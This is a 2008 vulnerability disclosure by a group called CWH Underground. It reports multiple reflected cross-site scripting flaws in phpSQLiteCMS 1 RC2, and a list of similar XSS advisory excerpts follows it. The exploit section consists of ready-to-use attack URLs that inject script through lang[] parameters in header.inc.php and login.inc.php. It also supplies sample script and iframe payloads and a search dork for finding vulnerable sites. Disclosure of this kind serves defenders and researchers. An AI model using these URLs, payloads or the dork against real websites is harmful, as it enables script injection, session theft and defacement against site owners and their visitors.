phpSQLiteCMS Multiple Remote XSS Vulnerability

==========================================================
phpSQLiteCMS Multiple Remote XSS Vulnerability
==========================================================

AUTHOR : CWH Underground
DATE : 21 May 2008
SITE : www.citec.us

#####################################################
APPLICATION : phpSQLiteCMS
VERSION : 1 RC2 (Lastest Version)
VENDOR : http://downloads.sourceforge.net/phpsqlitecms
#####################################################

DORK: "Powered By phpSQLiteCMS"

---Exploit---

[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]=<XSS>
[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]=<XSS>
[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]=<XSS>
[-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]=<XSS>
[-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]=<XSS>

Example for XSS :
<script>alert(123);</script>
<iframe src=http://www.google.com>
.

##################################################################
Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C
##################################################################

Relevant Pages

BMForum Remote 5.6 Miltiple XSS Vulnerability
... VENDOR: http://downloads.sourceforge.net/bmforum ... DORK: "powered by BMForum" ... http:////newtem/footer/bsd01footer.php?footer_copyright= <XSS> ...
(Bugtraq)
Re: [Full-disclosure] Cross site scripting issues in s9y (CVE-2008-1386, CVE-2008
... Cross Site Scripting (XSS) in serendipity 1.3 referrer plugin, ... 2008-03-18 Vendor contacted ...
(Full-Disclosure)
Re: [Full-disclosure] Cross site scripting issues in s9y (CVE-2008-1386, CVE-2008
... Cross Site Scripting (XSS) in serendipity 1.3 referrer plugin, ... In the referrer plugin of the blog application serendipity, ... 2008-03-18 Vendor contacted ... It's licensed under the creative commons attribution license. ...
(Full-Disclosure)
lostBook v1.1 Javascript Execution
... Vendor Notice ... Ok the only reason i consider this javascript execution instead of XSS. ... The Email and Website feild go through no filtering, and a malicous hacker could use that to insert javascript. ...
(Bugtraq)
WoltLab Burning Board <= 2.3.1 PL2 - XSS Vulnerability (24.04.05)
... Type: XSS ... Discovered by and deluxe89 ... The WoltLab Burning Board is a high customisable forum software for every kind of use. ... There isn't a patch from the vendor, but you can use htmlspecialcharsto fix it. ...
(Bugtraq)